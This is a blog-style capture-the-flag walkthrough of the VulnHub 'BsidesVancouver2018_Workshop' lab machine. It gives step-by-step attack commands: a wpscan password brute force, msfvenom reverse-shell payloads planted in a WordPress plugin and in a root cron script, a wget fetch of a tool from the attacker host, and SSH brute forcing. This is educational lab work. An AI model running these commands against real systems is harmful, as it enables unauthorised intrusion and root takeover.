BsidesVancouver2018_Workshop – VulnHub

In this CTF writeup i am going to give you a walkthrough of “BsidesVancouver2018_Workshop” which is a vulnerable machine designed for security enthusiasts to increase their vulnerability assessment and penetration skills.
You can download this machine from Vulnhub link provided.

This CTF is a part of BSides Vancouver series. This is an entry level boot2root web-based challenge. Goal is to gain root privilege through a web application hosted on this vulnerable machine.

1. Start with nmap -A 10.10.10.6

nmap results shows 3 open ports 21 FTP with anonymous login, 22 for SSH and 80 http.
Lets try all these one by one.


2. ftp 10.10.10.6 with login name anonymous: we get a file with usernames

Now Open the file which we got
cat /root/Desktop/users.txt.bk


3. Now let’s try with port 80, hit 10.10.10.6 in browser
As response we see that site is working.

Now let’s try /backup_wordpress
Voila! we get backup website and seems admin username is John.
Scroll down and you get WordPress login


4. Now do WP login bruteforce
wpscan –url http://10.10.10.6/backup_wordpress/wp-login.php –wordlist /root/10k-most-common.txt –username john –wp-content-dir wp-content

From WP scan bruteforcing we get an unknown response for enigma..
Let’s try this as password for john [Username:john & Password:enigma]

We get the WP site Dashboard.


5. Now create a payload to get meterpreter session

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.5 lport=4545 -f raw

From Dashboard Go to Plugin -> installed plugin -> Hello Dolly -> Edit
Now copy the payload generated into the plugin and save.


6. Open Metsploit and type commands as shown in screenshot.

Go to Plugin and click Activate
Once you click Activate you will get the Meterpreter session
Type shell and you will get a limited access shell


7. Now go to /tmp directory and download a linux privilege checker using wget.

Download a Linux Privilege Checker and start python -m SimpleHTTPServer:8080
wget http://10.10.10.5:8080/LinuxPrivilegechecker.py
Change permission to execute and run the script

As a result we can see cronjob running every minute as root.

Now Lets check what this is doing

It’s cleaning apache logs every minute.

Now lets create a payload for reverse shell and replace with cleanup file.

msfvenom -p cmd/unix/reverse_python lhost=10.10.10.5 lport=5555 R>cleanup

Replace this with the original file and you will get reverse connection.


8. Alternate way is use SSH Bruteforcing on Account which we got from user.txt.bk
Users abatchy,john and mai are having key based authentication.

For anne we get password prompt now start bruteforce Attack.

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *

five × one =